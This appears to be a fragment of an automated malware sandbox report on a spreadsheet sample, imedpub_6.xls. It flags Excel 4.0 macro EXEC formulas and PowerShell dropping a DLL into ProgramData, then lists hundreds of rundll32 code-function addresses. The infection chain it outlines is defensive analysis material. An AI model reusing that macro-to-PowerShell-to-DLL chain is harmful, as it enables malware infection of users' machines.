                            Powershell drops PE file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Found Excel 4.0 Macro with suspicious formulas
                            Source: imedpub_6.xlsInitial sample: EXEC
                            Source: imedpub_6.xlsInitial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100360079_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100410509_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003130F9_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100323E29_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100304609_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100415929_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003E59F9_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003960C9_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100317E29_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10040B0E9_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031BB69_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10041C569_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10036CB59_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001CD169_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10042D219_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031FC29_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033F8FD9_2_0033F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033E9919_2_0033E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033AB879_2_0033AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003390119_2_00339011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003400019_2_00340001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034907F9_2_0034907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003320519_2_00332051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003500569_2_00350056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003370B39_2_003370B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003420BA9_2_003420BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033F09B9_2_0033F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003441169_2_00344116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003381B79_2_003381B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003351BB9_2_003351BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003322519_2_00332251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034A2E89_2_0034A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033B2C79_2_0033B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033E2CC9_2_0033E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003353619_2_00335361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003343469_2_00334346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034C3A09_2_0034C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003513AD9_2_003513AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034E3959_2_0034E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034D3899_2_0034D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034F4359_2_0034F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034044F9_2_0034044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003364E29_2_003364E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003485199_2_00348519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003425509_2_00342550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033A55F9_2_0033A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003355489_2_00335548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003495FA9_2_003495FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033E5CF9_2_0033E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034C6319_2_0034C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003486069_2_00348606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034A6669_2_0034A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033D6D89_2_0033D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003466CA9_2_003466CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003377359_2_00337735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034473C9_2_0034473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003397149_2_00339714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034176B9_2_0034176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033B74D9_2_0033B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003348169_2_00334816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003418899_2_00341889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003389699_2_00338969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034894B9_2_0034894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003509B59_2_003509B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003359F29_2_003359F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034AA309_2_0034AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00331A569_2_00331A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033EA999_2_0033EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00338B3D9_2_00338B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034BB239_2_0034BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00340B199_2_00340B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033BB7E9_2_0033BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034CB5B9_2_0034CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00347BA69_2_00347BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00339B839_2_00339B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00344B879_2_00344B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00348BE39_2_00348BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034DBEA9_2_0034DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00332BD99_2_00332BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00349BCF9_2_00349BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00337C379_2_00337C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034AC3A9_2_0034AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00333C3C9_2_00333C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00350C149_2_00350C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00334C5D9_2_00334C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00346C499_2_00346C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034DCF79_2_0034DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00345CC49_2_00345CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00336D249_2_00336D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00346DF89_2_00346DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00347DD59_2_00347DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00339DCF9_2_00339DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00333E3F9_2_00333E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00350E3A9_2_00350E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034BE279_2_0034BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00335E609_2_00335E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034AE6D9_2_0034AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00340E539_2_00340E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033EE819_2_0033EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033AEFB9_2_0033AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00334EE39_2_00334EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00349EEC9_2_00349EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034DEDC9_2_0034DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00350F339_2_00350F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033CF479_2_0033CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033DFF39_2_0033DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00337FF29_2_00337FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C901110_2_001C9011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C3C3C10_2_001C3C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D044F10_2_001D044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D20BA10_2_001D20BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CD6D810_2_001CD6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CF8FD10_2_001CF8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D411610_2_001D4116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CAB8710_2_001CAB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E13AD10_2_001E13AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D95FA10_2_001D95FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C7FF210_2_001C7FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C59F210_2_001C59F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C481610_2_001C4816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E0C1410_2_001E0C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D860610_2_001D8606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D000110_2_001D0001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C3E3F10_2_001C3E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E0E3A10_2_001E0E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DAC3A10_2_001DAC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DF43510_2_001DF435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C7C3710_2_001C7C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DC63110_2_001DC631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DAA3010_2_001DAA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DBE2710_2_001DBE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C4C5D10_2_001C4C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E005610_2_001E0056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C1A5610_2_001C1A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C205110_2_001C2051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C225110_2_001C2251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D0E5310_2_001D0E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D6C4910_2_001D6C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D907F10_2_001D907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DAE6D10_2_001DAE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DA66610_2_001DA666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C5E6010_2_001C5E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CEA9910_2_001CEA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CF09B10_2_001CF09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D188910_2_001D1889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CEE8110_2_001CEE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C70B310_2_001C70B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DDEDC10_2_001DDEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CE2CC10_2_001CE2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D66CA10_2_001D66CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D5CC410_2_001D5CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CB2C710_2_001CB2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CAEFB10_2_001CAEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DDCF710_2_001DDCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D9EEC10_2_001D9EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DA2E810_2_001DA2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C64E210_2_001C64E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C4EE310_2_001C4EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D851910_2_001D8519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D0B1910_2_001D0B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C971410_2_001C9714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D473C10_2_001D473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C8B3D10_2_001C8B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C773510_2_001C7735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E0F3310_2_001E0F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C6D2410_2_001C6D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DBB2310_2_001DBB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CA55F10_2_001CA55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DCB5B10_2_001DCB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D255010_2_001D2550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CB74D10_2_001CB74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C554810_2_001C5548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D894B10_2_001D894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C434610_2_001C4346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CCF4710_2_001CCF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CBB7E10_2_001CBB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C896910_2_001C8969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D176B10_2_001D176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C536110_2_001C5361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DE39510_2_001DE395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CE99110_2_001CE991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DD38910_2_001DD389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D4B8710_2_001D4B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C9B8310_2_001C9B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C51BB10_2_001C51BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E09B510_2_001E09B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C81B710_2_001C81B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D7BA610_2_001D7BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DC3A010_2_001DC3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C2BD910_2_001C2BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D7DD510_2_001D7DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D9BCF10_2_001D9BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C9DCF10_2_001C9DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CE5CF10_2_001CE5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D6DF810_2_001D6DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CDFF310_2_001CDFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DDBEA10_2_001DDBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D8BE310_2_001D8BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003600711_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004105011_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003130F11_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100323E211_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003046011_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004159211_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003E59F11_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003960C11_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100317E211_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10040B0E11_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031BB611_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10041C5611_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10036CB511_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001CD1611_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10042D2111_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031FC211_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035F8FD11_2_0035F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035E99111_2_0035E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035AB8711_2_0035AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035901111_2_00359011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036000111_2_00360001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036907F11_2_0036907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0037005611_2_00370056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035205111_2_00352051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003570B311_2_003570B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003620BA11_2_003620BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035F09B11_2_0035F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036411611_2_00364116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003581B711_2_003581B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003551BB11_2_003551BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035225111_2_00352251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036A2E811_2_0036A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035B2C711_2_0035B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035E2CC11_2_0035E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035536111_2_00355361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035434611_2_00354346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036C3A011_2_0036C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003713AD11_2_003713AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036E39511_2_0036E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036D38911_2_0036D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036F43511_2_0036F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036044F11_2_0036044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003564E211_2_003564E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036851911_2_00368519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036255011_2_00362550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035A55F11_2_0035A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035554811_2_00355548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003695FA11_2_003695FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035E5CF11_2_0035E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036C63111_2_0036C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036860611_2_00368606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036A66611_2_0036A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035D6D811_2_0035D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003666CA11_2_003666CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035773511_2_00357735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036473C11_2_0036473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035971411_2_00359714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036176B11_2_0036176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035B74D11_2_0035B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035481611_2_00354816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036188911_2_00361889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035896911_2_00358969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036894B11_2_0036894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003709B511_2_003709B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003559F211_2_003559F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036AA3011_2_0036AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00351A5611_2_00351A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035EA9911_2_0035EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00358B3D11_2_00358B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036BB2311_2_0036BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00360B1911_2_00360B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035BB7E11_2_0035BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036CB5B11_2_0036CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00367BA611_2_00367BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00364B8711_2_00364B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00359B8311_2_00359B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00368BE311_2_00368BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036DBEA11_2_0036DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00352BD911_2_00352BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00369BCF11_2_00369BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00357C3711_2_00357C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00353C3C11_2_00353C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036AC3A11_2_0036AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00370C1411_2_00370C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00354C5D11_2_00354C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00366C4911_2_00366C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036DCF711_2_0036DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00365CC411_2_00365CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00356D2411_2_00356D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00366DF811_2_00366DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00367DD511_2_00367DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00359DCF11_2_00359DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00353E3F11_2_00353E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00370E3A11_2_00370E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036BE2711_2_0036BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00355E6011_2_00355E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036AE6D11_2_0036AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00360E5311_2_00360E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035EE8111_2_0035EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035AEFB11_2_0035AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00354EE311_2_00354EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00369EEC11_2_00369EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036DEDC11_2_0036DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00370F3311_2_00370F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035CF4711_2_0035CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035DFF311_2_0035DFF3
